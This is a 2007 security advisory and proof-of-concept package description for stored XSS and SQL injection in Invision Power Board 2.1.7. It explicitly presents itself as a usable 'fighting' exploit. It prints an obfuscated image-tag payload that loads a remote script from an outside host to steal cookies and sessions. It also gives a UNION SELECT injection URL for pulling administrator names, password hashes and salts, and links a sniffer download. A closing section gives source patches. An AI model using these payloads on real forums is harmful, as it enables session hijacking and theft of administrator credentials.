ipb217-xsssql.txt

`----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]  
  
INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION  
Eugene Minaev [email protected]  
___________________________________________________________________  
____/ __ __ _______________________ _______ _______________ \ \ \  
/ .\ / /_// // / \ \/ __ \ /__/ /  
/ / /_// /\ / / / / /___/  
\/ / / / / /\ / / /  
/ / \/ / / / / /__ //\  
\ / ____________/ / \/ __________// /__ // /   
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\  
\ \\ // // /  
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .   
. \_\\________[________________________________________]_________//_//_/ . .  
  
----[ NITRO ... ]  
  
This vulnerability was already found before, but there was no available   
public "figting" exploit for it. This POC consists of several parts - active xss generator,   
JS-file, which will be caused at visiting page with xss, log viewer and special component,  
which will take necessary data from MySQL forum's tables in case if intercepted session  
belonged to the person with moderator privileges.   
  
----[ ANALYSIS ... ]  
  
XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for   
future injetion on the forum board. As the reference it is necessary to specify the full way   
up to ya.js file (in which you have already preliminary corrected way on your own). Most likely   
it is necessary only to press the button.   
  
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,  
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),  
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)  
style=visibility:hidden =[/snapback].gif[/img]  
  
The injection can be executed only when there is available session of the user with access   
in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval"   
function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:  
  
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*  
  
----[ RECORD ... ]  
{  
  
---IP ADDRESS sniffed ip address  
---REFERER xssed theme  
---COOKIES xssed cookies of forum member  
---USER ID xssed user id of forum member  
---ADMIN NAME admin username  
---ADMIN PASS admin pass hash  
---ADMIN SALT admin hash salt  
  
}  
  
----[ PATCH ... ]  
  
FILE   
sources/classes/bbcode/class_bbcode_core.php  
FUNCTION  
regex_check_image  
LINE  
924  
REPLACE  
if ( preg_match( "/[?&;]/", $url) )  
ON  
if ( preg_match( "/[?&;\<\[]/", $url) )   
  
  
FILE  
sources/classes/bbcode/class_bbcode_core.php  
FUNCTION  
post_db_parse_bbcode  
LINE  
486  
REPLACE  
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );  
ON  
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );  
  
if ( $row['bbcode_tag'] == 'snapback' )  
{   
$match[2][$i] = intval( $match[2][$i] );  
}   
  
  
  
www.underwater.itdefence.ru/isniff.rar  
  
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]  
`